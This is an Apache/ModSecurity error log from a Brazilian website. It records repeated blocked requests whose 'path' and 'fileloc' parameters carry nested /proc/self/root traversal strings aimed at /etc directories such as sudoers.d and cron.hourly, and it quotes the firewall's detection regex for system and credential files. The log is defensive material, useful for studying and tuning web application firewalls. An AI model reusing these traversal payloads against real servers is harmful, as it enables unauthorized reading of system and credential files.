[Wed Mar 18 10:49:34.960343 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:55588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtbcdf6f5d65gmYZTWAwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:36.779318 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:55600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtcEzinOy1jxa1j4cWSQAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:37.743433 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:55600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtcUzinOy1jxa1j4cWTAAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:40.559100 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:55612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtdNY0UrI5A3LftIypZAAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:46.102982 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:51806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtetY0UrI5A3LftIypagAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:48.748871 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:51816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtfPu8EFLIOrSqIpsEsQAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:50.054986 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:46048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtftY0UrI5A3LftIypbAAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:51.458833 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:46064] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtfwkwaGbbGflqUZARZgAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:53.149359 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:46080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtgQkwaGbbGflqUZARagAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:53.695572 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:46080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtgQkwaGbbGflqUZARbAAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:55.077948 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:46090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtg_u8EFLIOrSqIpsEuQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:56.395188 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:46092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqthOw_le52K8_3pV3g3gAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:57.492750 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:58772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqthcdf6f5d65gmYZTWKQAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:49:59.834495 2026] [:error] [pid 31803:tid 140411741927168] [client 216.73.216.191:54554] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqth-yqAr6etmhZHNrBXAAAAEA"]
[Wed Mar 18 10:49:59.851898 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:46096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqth-oXxyEfFpUF8f9udQAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:50:00.208412 2026] [mime_magic:error] [pid 29882:tid 140411674785536] (70014)End of file found: [client 57.141.18.7:39528] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:50:01.295312 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:47460] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtidY0UrI5A3LftIypdgAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:50:03.675643 2026] [:error] [pid 15826:tid 140411725141760] [client 216.73.216.191:8764] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqti-oXxyEfFpUF8f9ueQAAAUI"]
[Wed Mar 18 10:50:04.135817 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:47464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtjEzinOy1jxa1j4cWbgAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:50:08.129476 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:47470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtjAkwaGbbGflqUZARfQAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:50:10.111033 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:50788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtksdf6f5d65gmYZTWMwAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:50:12.335159 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.243.128:50794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtlEzinOy1jxa1j4cWdAAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:50:12.973305 2026] [:error] [pid 17887:tid 140411616036608] [client 216.73.216.191:52760] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtlAkwaGbbGflqUZARiAAAAM8"]
